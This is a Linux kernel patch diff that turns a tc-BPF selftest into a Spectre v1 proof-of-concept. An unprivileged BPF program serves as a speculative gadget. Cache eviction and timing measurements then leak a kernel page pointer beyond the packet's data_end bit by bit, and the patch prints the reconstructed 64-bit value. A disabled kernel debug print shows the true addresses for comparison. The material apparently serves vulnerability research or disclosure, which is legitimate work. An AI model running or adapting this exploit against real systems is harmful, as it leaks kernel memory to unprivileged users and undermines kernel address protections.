diff --git a/net/sched/cls_bpf.c b/net/sched/cls_bpf.c
index 382c7a71f81f2d4ce63d3321e584e7ea3cd9218e..ef36ebca3b1123de8309889838e024cd5212b741 100644
--- a/net/sched/cls_bpf.c
+++ b/net/sched/cls_bpf.c
@@ -99,6 +99,28 @@ TC_INDIRECT_SCOPE int cls_bpf_classify(struct sk_buff *skb,
 			__skb_push(skb, skb->mac_len);
 			bpf_compute_data_pointers(skb);
 			filter_res = bpf_prog_run(prog->filter, skb);
+
+#if 0
+			// Print after program to not mess with the cache.
+			static atomic_t init = ATOMIC_INIT(0);
+			if (unlikely(skb_headlen(skb) == 170 && atomic_inc_return(&init) == 1)) {
+				barrier_nospec();
+				struct bpf_skb_data_end *cb = (struct bpf_skb_data_end *)skb->cb;
+				pr_err_ratelimited(
+					"skb = %px, skb_headlen(skb) = %d\n"
+					"data *(%px) = %px\n"
+					"data_end *(%px) = %px\n"
+					"kernel skb_shinfo(skb)->frags[0].bv_page\n\t*(%px ?= data+366 = %px) = %px\n",
+					skb, skb_headlen(skb),
+					&(skb->data), skb->data,
+					&(cb->data_end), cb->data_end,
+					&skb_shinfo(skb)->frags[0].bv_page,
+					((char *) skb->data) + 366,
+					skb_shinfo(skb)->frags[0].bv_page
+				);
+			}
+#endif
+
 			__skb_pull(skb, skb->mac_len);
 		} else {
 			bpf_compute_data_pointers(skb);
diff --git a/tools/testing/selftests/bpf/prog_tests/tc_bpf.c b/tools/testing/selftests/bpf/prog_tests/tc_bpf.c
old mode 100644
new mode 100755
index 48b55539331ee54130aa37e2b6103634d24c4d10..ec82e95895b52bdb12e320e8d2e6094c85f1537d
--- a/tools/testing/selftests/bpf/prog_tests/tc_bpf.c
+++ b/tools/testing/selftests/bpf/prog_tests/tc_bpf.c
@@ -2,6 +2,8 @@
 
 #include <test_progs.h>
 #include <linux/pkt_cls.h>
+#include <arpa/inet.h>
+#include <sys/socket.h>
 
 #include "cap_helpers.h"
 #include "test_tc_bpf.skel.h"
@@ -395,6 +397,251 @@ void tc_bpf_root(void)
 	test_tc_bpf__destroy(skel);
 }
 
+/* Print s followed by the current errno description (perror) and end the process with a failure status. */
+static void die(char *s) {
+	perror(s);
+	exit(EXIT_FAILURE);
+}
+
+#define SERVER "127.0.0.1" /* destination address that client() parses with inet_aton() */
+#define BUFLEN (128 * 1024) /* size of client_ping()'s static message buffer */
+#define PORT 8888 /* UDP port bound by server() and targeted by client() */
+
+/* Open a UDP socket and fill *si_other with SERVER:PORT; exits the process on failure, else returns the fd. */
+static int client(struct sockaddr_in *si_other) {
+	int s = socket(AF_INET, SOCK_DGRAM, IPPROTO_UDP);
+	if (s == -1) {
+		die("socket");
+	}
+	/* Clear the whole struct: sizeof(si_other) would only cover pointer-size bytes. */
+	memset(si_other, 0, sizeof(*si_other));
+	si_other->sin_family = AF_INET;
+	si_other->sin_port = htons(PORT);
+	if (inet_aton(SERVER, &si_other->sin_addr) == 0) {
+		fprintf(stderr, "inet_aton() failed\n");
+		exit(1);
+	}
+
+	return s;
+}
+
+/* Create a UDP socket bound to INADDR_ANY:PORT and return it; any failure ends the process via die(). */
+static int server(void) {
+	/* Members not named in the initializer are zero-initialized. */
+	struct sockaddr_in bind_addr = {
+		.sin_family = AF_INET,
+		.sin_port = htons(PORT),
+		.sin_addr.s_addr = htonl(INADDR_ANY),
+	};
+	int fd = socket(AF_INET, SOCK_DGRAM, IPPROTO_UDP);
+
+	if (fd == -1) {
+		die("socket");
+	}
+
+	if (bind(fd, (struct sockaddr *) &bind_addr, sizeof(bind_addr)) == -1) {
+		die("bind");
+	}
+
+	return fd;
+}
+
+/* Send one n-byte UDP datagram filled with 0x37 to *si_other over s; die()s if sendto() fails, else returns 0. */
+static int client_ping(int s, struct sockaddr_in *si_other, size_t n) {
+	/* NOTE(review): n is not checked against BUFLEN; the visible callers pass at most 16 KiB. */
+	static char payload[BUFLEN] = {};
+	const struct sockaddr *dst = (struct sockaddr *) si_other;
+	memset(payload, 0x37, n);
+	if (sendto(s, payload, n, 0, dst, sizeof(*si_other)) == -1) {
+		die("sendto()");
+	}
+	return 0;
+}
+
+#define CAT(a, b, d, c) a ## b ## d ## c /* paste four tokens into one identifier */
+#define NAME(S1, S2) CAT(pkt_ptr_, S1, _, S2) /* NAME(366, 1) -> pkt_ptr_366_1 */
+/* One "else if" arm: selects skel->progs.pkt_ptr_<BYTE>_<MASK> when the caller's offset/mask locals match. */
+#define EI_MASK(BYTE, MASK)			\
+	else if (offset == BYTE && mask == MASK) fd = bpf_program__fd(skel->progs.NAME(BYTE, MASK));
+/* Eight EI_MASK arms for one byte offset, one per single-bit mask from 1 to 128. */
+#define EI_BYTE(BYTE) \
+	EI_MASK(BYTE, 1) \
+	EI_MASK(BYTE, 2) \
+	EI_MASK(BYTE, 4) \
+	EI_MASK(BYTE, 8) \
+	EI_MASK(BYTE, 16) \
+	EI_MASK(BYTE, 32) \
+	EI_MASK(BYTE, 64) \
+	EI_MASK(BYTE, 128)
+
+static int exploit(struct test_tc_bpf *skel, long long *skipped, long long *total,
+				   long long *t0, long long *t1, int offset, int mask) {
+	DECLARE_LIBBPF_OPTS(bpf_tc_hook, hook, .ifindex = LO_IFINDEX, .attach_point = BPF_TC_INGRESS);
+	/* Attach pkt_ptr_<offset>_<mask> at lo ingress, send UDP pings, and tally leakmap votes in *t0 / *t1. */
+	int fd;
+	if (offset == 350 && mask == 1) fd = bpf_program__fd(skel->progs.pkt_ptr_350_1);
+	EI_BYTE(366)
+	EI_BYTE(367)
+	EI_BYTE(368)
+	EI_BYTE(369)
+	EI_BYTE(370)
+	EI_BYTE(371)
+	EI_BYTE(372)
+	EI_BYTE(373)
+	else {
+		errno = EINVAL;
+		die("mask/offset");
+	}
+	/* Returns 0 once sampling finished, -1 on sample timeout, or the error of a failed setup/sampling call. */
+	DECLARE_LIBBPF_OPTS(bpf_tc_opts, opts, .prog_fd = fd);
+	int ret;
+
+	ret = bpf_tc_hook_create(&hook);
+	ret = ret == -EEXIST ? 0 : ret;
+	if (ret) {
+		errno = -ret;
+		perror("hook create");
+		if (!ASSERT_OK(ret, "bpf_tc_hook_create(BPF_TC_INGRESS)"))
+			goto destroy;
+	}
+	/* If attach fails, no socket is open and nothing is attached, so bypass the end: cleanup. */
+	ret = bpf_tc_attach(&hook, &opts);
+	if (ret)
+		if (!ASSERT_OK(ret, "bpf_tc_attach"))
+			goto destroy;
+
+	int ss = server();
+	struct sockaddr_in si_server;
+	int cs = client(&si_server);
+
+	client_ping(cs, &si_server, 16*1024); // make it set bv_page != 0
+
+#define LEAKMAP_ENTRIES (5 * 512)
+	/* Seed every 512th slot with a non-positive marker so the delta check below can spot unwritten slots. */
+	for (__u32 i = 0; i < LEAKMAP_ENTRIES; i += 512) {
+		__u32 key = i;
+		__s64 value = -(__s64)i;
+		ret = bpf_map__update_elem(skel->maps.leakmap,
+								   &key, sizeof(key),
+								   &value, sizeof(value), 0);
+		if (ret) {
+			if (!ASSERT_OK(ret, "init_leak"))
+				goto end;
+		}
+	}
+
+// for 128KiB L1d, 90MiB L3, 1536-entry sltlb
+#define EVICTMAP_ENTRIES (8 * 128 * 1024)
+	for (__u32 i = 0; i < EVICTMAP_ENTRIES; i += 8) {
+		__u32 index = i / 8;
+		__u32 key = i + (index % 8);
+		__u64 value = i;
+		ret = bpf_map__update_elem(skel->maps.evictmap, &key, sizeof(key), &value, sizeof(value), 0);
+		if (ret) {
+			if (!ASSERT_OK(ret, "init_evict"))
+				goto end;
+		}
+	}
+
+	long long n = 0;
+#define T 8
+#define N 8
+	long long i;
+	for (i = 0; n < N; i++) {
+		// Branch prediction using PHT will be wrong unless it knows rand().
+		int t = rand() % T;
+		for (int j = 0; j < t; j++) {
+			client_ping(cs, &si_server, 512);
+		}
+		client_ping(cs, &si_server, 128); // + 42 byte header
+
+#define X 4
+		__s64 delta[X];
+		for (size_t j = 0; j < X; j++) {
+			__u32 key[X] = {0, 512, 1536, 1024};
+			ret = bpf_map__lookup_elem(skel->maps.leakmap, &key[j], sizeof(key[j]),
+									   &delta[j], sizeof(delta[j]), 0);
+			if (ret) {
+				if (!ASSERT_OK(ret, "delta lookup"))
+					goto end;
+			}
+			if (delta[j] <= 0) {
+				ASSERT_OK(-1, "delta not written by bpf program");
+			}
+		}
+
+		__u32 key = 2048;
+		__u64 err;
+		ret = bpf_map__lookup_elem(skel->maps.leakmap, &key, sizeof(key), &err, sizeof(err), 0);
+		if (ret) {
+			if (!ASSERT_OK(ret, "err lookup"))
+				goto end;
+		}
+		static bool first = true;
+		if (err && first) {
+			first = false;
+			ASSERT_OK(-err, "bpf");
+		}
+
+		if (i == 2 * 2 * N) {
+			// reload and retry
+			ret = -1;
+			// fprintf(stderr, "i: timeout after %lld reps\n", i);
+			break;
+		}
+
+		// sometimes everything is still in the cache
+		if (!((delta[3] < delta[2]))) {
+			// fprintf(stderr, "skip: uncached\t%lld, cached\t%lld, 0\t%lld, 1\t%lld\n", delta[2], delta[3], delta[0], delta[1]);
+			continue;
+		}
+		/* One vote per accepted sample, scaled by 1000 ahead of the division by n after the loop. */
+		if (delta[0] > delta[1])
+			*t0 += 1000;
+		else
+			*t1 += 1000;
+		n++;
+	}
+	/* Report the rounds that produced no vote (i - n) and the total number of rounds run. */
+	*skipped += i-n;
+	*total += i;
+
+	if (n > 0) {
+		*t0 /= n;
+		*t1 /= n;
+	}
+
+	__u32 key = 0;
+	__u64 value;
+	int ret2 = bpf_map__lookup_elem(skel->maps.evictmap,
+							   &key, sizeof(key),
+							   &value, sizeof(value), 0);
+	if (ret2) {
+		if (!ASSERT_OK(ret2, "lookup"))
+			goto end;
+	}
+	if (value > i*T) {
+		ASSERT_OK(-1, "BUG value > i*T");
+		goto end;
+	}
+
+end:
+	close(ss);
+	close(cs);
+
+	opts.prog_fd = opts.prog_id = 0;
+	ret2 = bpf_tc_detach(&hook, &opts);
+	if (ret2)
+		ASSERT_OK(ret2, "bpf_tc_detach");
+
+destroy:
+	ret2 = bpf_tc_hook_destroy(&hook);
+	if (ret2)
+		ASSERT_OK(ret2, "bpf_tc_hook_destroy");
+
+	return ret;
+}
+
 void tc_bpf_non_root(void)
 {
 	struct test_tc_bpf *skel = NULL;
@@ -409,11 +656,90 @@ void tc_bpf_non_root(void)
 	if (!ASSERT_OK(ret, "disable_cap_sys_admin"))
 		goto restore_cap;
 
-	skel = test_tc_bpf__open_and_load();
-	if (!ASSERT_OK_PTR(skel, "test_tc_bpf__open_and_load"))
-		goto restore_cap;
+	libbpf_set_print(NULL);
+
+#define O 1
+	for (int k = 0; k < O; k++) {// to test reproducibility
+
+		// Must match generated pkt_ptr programs in test_tc_bpf.c and exploit()
+		// function.
+		__u64 base_byte = 366;
+
+		long long skipped = 0;
+		long long total = 0;
+		long long bad_loads = 0;
+		long long total_loads = 0;
+		__u64 qw = 0;
+
+		for (__u64 byte = 0; byte < 8; byte++) {
+			for (__u64 bit = 0; bit < 8; bit++) {
+
+				long long dmax = INT_MIN;
+				long long dmin = INT_MAX;
+				long long d = 0;
+				long long m = 0;
+#define M 8
+				int j = 0;
+				for (j = 0; true; j++) {
+					total_loads += 1;
+					skel = test_tc_bpf__open_and_load();
+					if (skel) {
+						long long t0 = 0, t1 = 0;
+
+						ret = exploit(skel,
+									  &skipped, &total,
+									  &t0, &t1,
+									  base_byte + byte, 1 << bit);
+						if (ret == -1) {
+							bad_loads += 1;
+							goto cleanup;
+						}
+						if (ret)
+							if (!ASSERT_OK(ret, "exploit"))
+								goto restore_cap;
+
+						if (j == 0) {
+							goto cleanup;
+						}
+
+						long long jd = t0 - t1;
+						dmax = jd > dmax ? jd : dmax;
+						dmin = jd < dmin ? jd : dmin;
+						d += jd;
+						m++;
+					}
+				cleanup:
+					test_tc_bpf__destroy(skel);
+
+					if (j == 64 * M) {
+						fprintf(stderr, "failed to read bit accurately because of too many consecutive bad loads or inconclusive result, will continue anyway");
+						break;
+					}
+
+					// Continue as long as result is inconclusive.
+					if (m >= M && (d / m >= 200 || d / m <= -200)) {
+						break;
+					}
+				}
+
+				d /= m;
+
+				fprintf(stderr, "*(data+%lld):%lld = %lld < avg %lld < %lld (ps), j = %d\n", base_byte + byte, bit, dmin, d, dmax, j);
+
+				// little endian
+				__u64 b = !!(d < 0 ? 0 : 1);
+				qw |= b << ((byte * 8) + bit);
+			}
+		}
+		fprintf(stderr, "userspace guess for *(u64 *)(data+%lld = data_end+%lld) = 0x%llx\n"
+				"\t>%lld percent bad samples; %lld percent bad loads\n",
+				base_byte, base_byte - 42 - 128, qw,
+				(skipped * 100) / total,
+				(bad_loads * 100) / total_loads);
 
-	test_tc_bpf__destroy(skel);
+	}
+
+	ASSERT_OK(-1, "exploit");
 
 restore_cap:
 	if (caps)
diff --git a/tools/testing/selftests/bpf/progs/test_tc_bpf.c b/tools/testing/selftests/bpf/progs/test_tc_bpf.c
old mode 100644
new mode 100755
index ef7da419632a2146be37e8a1d271e5d4ac87af29..c5344255ce88eb43241ae4ac6d019e14f03b9b97
--- a/tools/testing/selftests/bpf/progs/test_tc_bpf.c
+++ b/tools/testing/selftests/bpf/progs/test_tc_bpf.c
@@ -4,6 +4,7 @@
 #include <bpf/bpf_helpers.h>
 #include <linux/if_ether.h>
 #include <linux/ip.h>
+#include "bpf_misc.h"
 
 /* Dummy prog to test TC-BPF API */
 
@@ -13,13 +14,74 @@ int cls(struct __sk_buff *skb)
 	return 0;
 }
 
-/* Prog to verify tc-bpf without cap_sys_admin and cap_perfmon */
-SEC("tcx/ingress")
-int pkt_ptr(struct __sk_buff *skb)
-{
-	struct iphdr *iph = (void *)(long)skb->data + sizeof(struct ethhdr);
+/* pkt-ptr-based Spectre v1 gadget */
 
-	if ((long)(iph + 1) > (long)skb->data_end)
-		return 1;
-	return 0;
+#define LEAKMAP_ENTRIES (5 * 512)
+/* Result map shared with userspace: the test's exploit() seeds and reads keys 0, 512, 1024, 1536 and 2048. */
+struct {
+	__uint(type, BPF_MAP_TYPE_ARRAY);
+	__uint(max_entries, LEAKMAP_ENTRIES);
+	__type(key, __u32);
+	__type(value, __u64);
+} leakmap SEC(".maps");
+
+#define L1_SIZE_KiB 128
+#define SIZEOF_CACHELINE 64
+#define EVICTMAP_ENTRIES (8 * 128 * 1024)
+/* Large array map; callback_fn() increments one __u64 out of every eight consecutive entries. */
+struct {
+	__uint(type, BPF_MAP_TYPE_ARRAY);
+	__uint(max_entries, EVICTMAP_ENTRIES);
+	__type(key, __u32);
+	__type(value, __u64);
+} evictmap SEC(".maps");
+
+static long callback_fn(__u32 index, void *ctx) {
+	/* Eight __u64 values fill one 64-byte cacheline; (index % 8) varies the slot picked inside it. */
+	__u32 slot = index * 8 + (index % 8);
+	__u64 *counter = bpf_map_lookup_elem(&evictmap, &slot);
+	if (!counter)
+		return 1;
+	/* Bump the evictmap entry; a failed lookup above is reported to the caller as 1 instead. */
+	*counter += 1;
+	return 0;
 }
+
+#define STRINGIFY(x) #x
+#define TOSTRING(x) STRINGIFY(x)
+#define CAT(a, b, d, c) a ## b ## d ## c
+#define NAME(S1, S2) CAT(pkt_ptr_, S1, _, S2)
+/* Includes are parameterized by OFFSET/MASK; presumably each emits a program named NAME(OFFSET, MASK) -- TODO confirm in the header. */
+#define OFFSET 350
+#define MASK 1
+#include "test_tc_bpf_pkt_ptr.h"
+#undef OFFSET
+#undef MASK
+
+// 366 = PAYLOAD + 42 + 196 with PAYLOAD=128
+#define OFFSET 366
+#include "test_tc_bpf_pkt_ptr_byte.h"
+#undef OFFSET
+#define OFFSET 367
+#include "test_tc_bpf_pkt_ptr_byte.h"
+#undef OFFSET
+#define OFFSET 368
+#include "test_tc_bpf_pkt_ptr_byte.h"
+#undef OFFSET
+#define OFFSET 369
+#include "test_tc_bpf_pkt_ptr_byte.h"
+#undef OFFSET
+#define OFFSET 370
+#include "test_tc_bpf_pkt_ptr_byte.h"
+#undef OFFSET
+#define OFFSET 371
+#include "test_tc_bpf_pkt_ptr_byte.h"
+#undef OFFSET
+#define OFFSET 372
+#include "test_tc_bpf_pkt_ptr_byte.h"
+#undef OFFSET
+#define OFFSET 373
+#include "test_tc_bpf_pkt_ptr_byte.h"
+#undef OFFSET
+
+char LICENSE[] SEC("license") = "GPL";